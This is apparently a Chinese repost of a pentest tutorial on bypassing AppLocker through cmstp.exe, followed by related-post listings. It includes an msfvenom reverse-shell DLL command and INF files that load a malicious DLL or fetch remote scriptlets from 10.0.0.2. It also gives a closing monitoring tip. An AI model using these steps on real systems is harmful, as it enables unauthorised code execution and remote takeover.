利用CMSTP绕过AppLocker并执行代码

最新推荐文章于 2022-10-16 11:42:17 发布
最新推荐文章于 2022-10-16 11:42:17 发布
阅读量215 收藏
点赞数
文章标签: shell
原文链接:https://yq.aliyun.com/articles/596234
版权

CMSTP是与Microsoft连接管理器配置文件安装程序关联的二进制文件。它接受INF文件,这些文件可以通过恶意命令武器化,以脚本(SCT)和DLL的形式执行任意代码。它是位于以下两个Windows目录中的受信任的Microsoft二进制文件。

· C:\Windows\System32\cmstp.exe

· C:\Windows\SysWOW64\cmstp.exe

AppLocker默认规则允许在这些文件夹中执行二进制文件,因此它可以用作绕过方法。最初Oddvar Moe发现可以使用这个CMSTP文件绕过AppLocker和UAC,并在他的博客上发表他的研究成果!

DLL

Metasploit Framework可用于通过msfvenom生成恶意DLL文件。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 LPORT=4444 -f dll>/root/Desktop/pentestlab.dll

利用CMSTP绕过AppLocker并执行代码

Metasploit – DLL生成

INF文件的RegisterOCXSection需要包含恶意DLL文件的本地路径或远程执行的WebDAV位置。

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"

利用CMSTP绕过AppLocker并执行代码

CMSTP – 本地DLL执行

Metasploit multi / handler模块需要配置为接收请求。

利用CMSTP绕过AppLocker并执行代码

CMSTP – Metasploit多处理程序

当恶意INF文件与cmstp一起提供时,代码将在后台执行。

cmstp.exe /s cmstp.inf

利用CMSTP绕过AppLocker并执行代码

CMSTP – INF在本地执行

Meterpreter会话将从DLL执行中打开。

利用CMSTP绕过AppLocker并执行代码

CMSTP – 通过DLL执行的Meterpreter

SCT

除了DLL文件外,cmstp还能够运行SCT文件,这些文件在红队运行期间扩展了此二进制文件的可用性。Nick Tyrer最初通过推特展示了这种能力。

Nick Tyrer还编写了一个名为powersct.sct的scriptlet ,可以将其用作执行PowerShell命令的备选解决方案,以防本机PowerShell被阻止。该UnRegisterOCXSection需要包含小脚本的URL。最终的INF文件需要包含以下内容:

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/powersct.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"

当INF文件将执行一个新的窗口将打开,这将允许用户执行PowerShell命令。

cmstp.exe /s cmstp.inf

利用CMSTP绕过AppLocker并执行代码

CMSTP – PowerShell

代码执行也可以通过使用scriptlet来调用恶意可执行文件。INF文件需要包含scriptlet的远程位置。

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/pentestlab.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"

利用CMSTP绕过AppLocker并执行代码

CMSTP – SCT执行

在执行INF文件时,将会打开一个新的命令提示符窗口,这将表示代码已成功执行。

利用CMSTP绕过AppLocker并执行代码

CMSTP – 使用Scriptlet执行INF

Meterpreter获取到shell。

利用CMSTP绕过AppLocker并执行代码

CMSTP – Meterpreter通过SCT执行

结论

CMSTP需要INF文件并在执行时生成一个CMP文件,它是连接管理器设置文件。这两个文件实际上都是文本文件,不太可能触发任何警报。因此,如果攻击者已经开始使用此技术,cmstp.exe二进制文件无法被AppLocker规则阻止,则需要对这两个文件进行监视。

利用CMSTP绕过AppLocker并执行代码

CMSTP – INF和CMP文件


原文发布时间为:2018-05-23

本文来自云栖社区合作伙伴“嘶吼网”,了解相关信息可以关注“嘶吼网”。


weixin_34403693
关注
提权技术之Bypass UAC
weixin_42071117的博客
10-19 896
// UAC(用户账户控制)是微软在Windows VISTA以后版本中引入的一种安全机制。通过UAC,应用程序和任务始终在非管理员权限下的安全上下文中运行。 // 除非特别授予管理员权限。UAC可以阻止未经授权的应用程序自动进行安装,并防止无意地更改系统设置。 // UAC需要授权的动作包括:配置Windows Update、增加或删除用户账户、更改用户账户的类型、改变UAC设置、安装ActiveX、安装或移除程序、安装设备驱动程序、 // 设置家长控制、将文件移动或复制到Program File或Wi
第八十七课:基于白名单Cmstp.exe执行payload第十六季.docx
09-15
第八十七课:基于白名单Cmstp.exe执行payload第十六季.docx
对亮神基于白名单 Cmstp.exe 执行 payload 第十六季复现
cxk
05-06 274
待补充…
AppLockerDemo
01-15
一个应用锁(AppLocker)的示例程序,包含完整的界面实现和业务逻辑,供大家参考。
使用CMSTP绕过AppLocker
prettyX的博客
07-10 378
0x01 AppLocker简介 0、在大型组织的安全领域中,AppLocker正在扮演越来越重要的角色,应用AppLocker规则可以显著降低企业的安全风险 1、AppLocker:即“应用程序控制策略”,是Windows 7系统中新增加的一项安全功能,在Windows 7以上的系统中都集成了该功能 2、利用AppLocker,管理员可以非常方便地进行配置,以实现管理用户在计算机上可以运行哪些程序、安装哪些文件、运行哪些脚本 3、由于AppLocker是基于组策略管理和配置的,因此,企业IT管理员
渗透测试-基于白名单执行payload--Cmstp
weixin_30825199的博客
05-03 1099
0x01 Cmstp简介 Cmstp安装或删除“连接管理器”服务配置文件。如果不含可选参数的情况下使用,则 cmstp 会使用对应于操作系统和用户的权限的默认设置来安装服务配置文件。 微软官方文档: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp 说明:Cmstp.e...
自强者cmsTP5.0.22米家内容管理系统源代码
03-18
程序由thinkphp5内核+mysql+hui模板开发而成,美化thinkphp5 error错误跳转页面,thinkphp5全站生成伪静态文件,代码循化标签化。 源码是由thinkphp5内核开发,系统包括 系统设置 - 权限管理 - 内容管理 - 广告管理...
cmstp.exe.mui
01-04
cmstp.exe
基于PHP的自强者cmsTP5.0.22米家内容管理系统源码.zip
最新发布
01-24
总结来说,这个基于PHP的自强者cmsTP5.0.22米家内容管理系统源码是一个为Web开发者设计的工具,它利用了强大的ThinkPHP框架,提供了丰富的功能和高度可定制性。通过学习和利用这些源码,开发者可以创建、修改和优化...
基于PHP的自强者cmsTP5.0.22米家内容管理系统.zip
10-10
【标题】"基于PHP的自强者cmsTP5.0.22米家内容管理系统"是一个专为构建网站内容管理而设计的应用程序,采用PHP编程语言进行开发。此系统基于ThinkPHP(TP)框架的5.0.22版本,这是一个流行的、轻量级的PHP MVC(模型...
使用cmstp绕过应用程序白名单
weixin_30237719的博客
03-08 270
默认情况下,AppLocker允许在文件夹中执行二进制文件,这是可以绕过它的主要原因。已经发现,这样的二进制文件可以很容易地用于绕过AppLockerUAC。与Microsoft相关的二进制文件之一是CMSTPCMSTP welcomes INF文件,因此通过INF进行开发是可能的。因此,我们将学习如何进行此类开发。 众所周知,CMSTP接受SCT文件,然后无提示地运行,因此我们将创建...
UAC学习之路
weixin_42282189的博客
12-31 664
作者: Crlt_TT豆 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 什么是uacUAC 用于允许管理员用户不对每个执行的进程授予管理员权限这是作为管理员UAC提升执行,如果成功完成,特权令牌用于创建进程。 这里为了区分低权限高权限的进程,微软使用了强制性完整性控制MIC MIC介绍 查看自己当前的完整性级别 whoami /groups 接下来我们以该级别创建一个文件 现在我们以管理员cmd给予test.txt最高的系统权限 可以看见我们对该文件是有.
APT视频教程
12-13
这套课程主要给大家讲解什么是APT,APT是如何攻击的,国外有哪些组织用一般用的什么手段,内容涉及到APT攻击模拟,样本分析,流量分析,特征提取。
内网渗透之 windows 基础
qq_49433473的博客
10-16 4492
windows用户、组、SID以及基本命令,了解windows 认证及密码、windows UAC机制、认识 windows ASR以及Windows Applocker,Token的组成,Windows PowerShell的使用与绕过方式、最后认识域
ATT & CK 阶段之 Execution -- CMSTP
sojrs_sec的博客
05-09 1575
前言 ATT&CK 阶段之Executon即执行:当黑客入侵成功之后,往往会通过一系列的命令去获取信息、创建持续性会话。本文主要讲解通过cmstp.exe命令执行,调用恶意的dll或者com脚本(sct)。这种方式可以绕过applocker或者其他白名单的防御方式以及UAC. cmstp基本命令使用 cmstp.exe /s /ns C:\Users\ADMINI~W\AppData\Local\Temp\XKNqbpzl.txt 在cmd中执行cmstp.exe -h 安装配置 cmstp.e
应用锁(AppLocker)原理及代码实现
热门推荐
飞久
01-15 1万+
最近工作上要用到应用锁(AppLocker),早上装了个试玩了一下,下午花了2个小时捣鼓出来一个demo (基于android 6.0),简单分享一下。   免责声明:这篇文章纯粹是个人YY,未参考或反编译任何商业app。   所谓应用锁,说白了就是在监测到目标app启动时额外起一个锁屏界面把它盖住。这种方式的缺点是显而易见的,无法100%保证盖住,有时候会先闪出一个app启动界面,然后才
通过regsrv32.exe绕过Applocker应用程序白名单的多种方法
systemino的博客
04-30 688
在大型组织的安全领域中,AppLocker正在扮演越来越重要的角色。应用AppLocker规则可以显著降低企业的安全风险,AppLocker规则可以应用于目标应用,这些规则也是构成AppLocker策略的基本组件。 AppLocker规则介绍 规则集合(Rule Collection) AppLocker控制台以规则集合作为组织单元,这些集合包括可执行文件、脚本、Windows安装文件、封装...
控制台窗口和powershell运行服务会卡住的解决办法
weixin_30352645的博客
01-04 2539
之前使用nodejs做了一个简单的web服务,通过控制台窗口运行,通过浏览器访问发现有时候浏览器等很久数据都加载不出来,以为是代码有问题,后来发现是控制台卡住了,按一下enter键就好了,当时百度了一下,没有找到有用的消息,就没有管了,最近使用dotnet core 运行的时候,又遇到了,于是又百度了一下,所幸,这次找到原因和解决办法了,原来是控制台窗口的快速编辑模式导致的。 解决办法是可以打开任...
远控免杀技术:白名单策略详解(113个程序)
7. **其他如 Cmstp.exe、Ftp.exe、Regasm.exe/Regsvcs.exe 等**:这些工具各有特定用途,但都可能被利用绕过安全限制。 文章还提到了利用 MSWindows 系统自带的其他45个程序,包括: - **At.exe、Atbroker.exe**...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值